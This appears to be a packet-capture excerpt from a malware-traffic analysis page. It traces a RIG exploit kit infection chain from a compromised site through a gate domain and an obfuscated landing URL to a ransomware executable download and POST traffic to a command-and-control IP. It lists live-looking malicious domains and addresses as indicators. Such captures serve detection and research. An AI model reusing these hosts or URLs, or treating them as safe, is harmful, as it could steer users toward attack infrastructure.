Text Example

RIG Exploit Kit EK Delivers Ransomware Variant CryptFile2 Malware C2 PCAP file download

2016-09-19 09:49:33.246002 IP 192.168.4.57.49469 > 192.185.52.124.80: Flags [P.], seq 1:303, ack 1, win 16537, length 302: HTTP: GET / HTTP/1.1
E..V4 @….k…9..4|.=.P’…….P.@..F..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: photos2tile.com
Connection: Keep-Alive
Cookie: PHPSESSID=11621c75d998a91f4a371effa2d932a8


2016-09-19 09:49:40.123529 IP 192.168.4.57.49490 > 31.184.193.187.80: Flags [.], ack 1, win 16537, length 0
E..(D.@……..9…..R.P.U/~.I..P.@………..
2016-09-19 09:49:40.123610 IP 192.168.4.57.49491 > 31.184.193.187.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: GET / HTTP/1.1
E..AD.@……..9…..S.P…….ZP.@.p<..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://photos2tile.com/
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.autogrs.party
Connection: Keep-Alive

2016-09-19 09:49:43.630996 IP 192.168.4.57.49493 > 109.234.36.38.80: Flags [P.], seq 1155:1604, ack 27918, win 16265, length 449: HTTP: GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
E…NF@…S….9m.$&.U.Pt…….P.?.A…GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: add.arielcatering.com
Connection: Keep-Alive

2016-09-19 09:49:43.816016 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], ack 1604, win 258, length 0
E..(S.@.8…m.$&…9.P.U….t…P…V…
2016-09-19 09:49:44.884404 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], seq 27918:29268, ack 1604, win 258, length 1350: HTTP: HTTP/1.1 200 OK
E..nS.@.8…m.$&…9.P.U….t…P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Sep 2016 13:49:46 GMT
Content-Type: application/x-msdownload
Content-Length: 98304
Connection: keep-alive
Accept-Ranges: bytes

2016-09-19 09:49:50.836417 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 1:154, ack 1, win 16537, length 153: HTTP: GET /headers.jpg HTTP/1.1
E…O.@……..9…n.V.P….(_..P.@…..GET /headers.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 176.31.127.110
Cache-Control: no-cache

2016-09-19 09:49:51.102944 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [.], ack 154, win 237, length 0
E..(..@.3.R;…n…9.P.V(_……P…A…
2016-09-19 09:49:51.370886 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [P.], seq 1:234, ack 154, win 237, length 233: HTTP: HTTP/1.1 200 OK
E…..@.3.QQ…n…9.P.V(_……P…….HTTP/1.1 200 OK
Date: Mon, 19 Sep 2016 13:50:08 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: "7-5332e92dca840"
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg

default
2016-09-19 09:49:51.371212 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [.], ack 234, win 16479, length 0
E..(O.@……..9…n.V.P….(_.{P.@_.0……..
2016-09-19 09:49:54.845384 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 154:331, ack 234, win 16479, length 177: HTTP: POST /zig/offers.php HTTP/1.1
E…O.@……..9…n.V.P….(_.{P.@_….POST /zig/offers.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 176.31.127.110
Content-Length: 1395
Cache-Control: no-cache

 
